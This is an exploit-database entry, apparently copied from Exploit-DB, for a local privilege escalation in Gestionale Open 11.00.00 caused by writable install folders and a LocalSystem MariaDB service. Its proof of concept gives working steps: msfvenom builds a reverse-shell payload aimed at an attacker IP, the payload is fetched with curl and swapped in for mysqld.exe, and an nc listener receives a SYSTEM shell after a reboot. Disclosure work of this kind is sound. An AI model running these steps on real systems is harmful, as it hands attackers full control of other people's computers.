header-logo
Suggest Exploit
vendor:
Gestionale Open
by:
Alessandro 'mindsflee' Salzano
7.5
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: Gestionale Open
Affected Version From: 11.00.00
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 10 Enterprise x64
2021

Gestionale Open 11.00.00 – Local Privilege Escalation

By default, the Authenticated Users group has the modify permission to Gestionale Open folders/files. A low privilege account can rename the mysqld.exe file located in the bin folder and replace it with a malicious file that would connect back to an attacking computer, giving system level privileges. The service running as Local System allows the execution of the malicious file when the computer is restarted. The application also has unquoted service path issues.

Mitigation:

Implement proper folder and file permissions to restrict access to authorized users. Ensure that services use properly quoted paths to prevent unquoted service path issues.
Source

Exploit-DB raw data:

# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Homepage: https://www.gestionaleopen.org/
# Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
# Version: 11.00.00
# Tested on: Microsoft Windows 10 Enterprise x64

With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.

Vendor: Gestionale Open srl.

Affected version: > 11.00.00


# Details
# By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

The application also have unquoted service path issues.

(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:

C:\Gestionale_Open\MySQL57\bin\mysqld.exe


	Details:



SERVICE_NAME: DB_GO
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DB_GO
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem



(2) Folder permissions.
Insecure folders permissions issue:


C:\Gestionale_Open Everyone:(I)(OI)(CI)(F)
                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)



                                # Proof of Concept

1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 4242
    service apache2 start

3. Download malicious .exe on victim machine
    type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
    Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
    Rename downloaded 'mysqld_evil.exe' file in mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
    C:\Windows\system32>whoami
    whoami
    nt authority\system

Navigation

Suggest Exploit

Services By CQR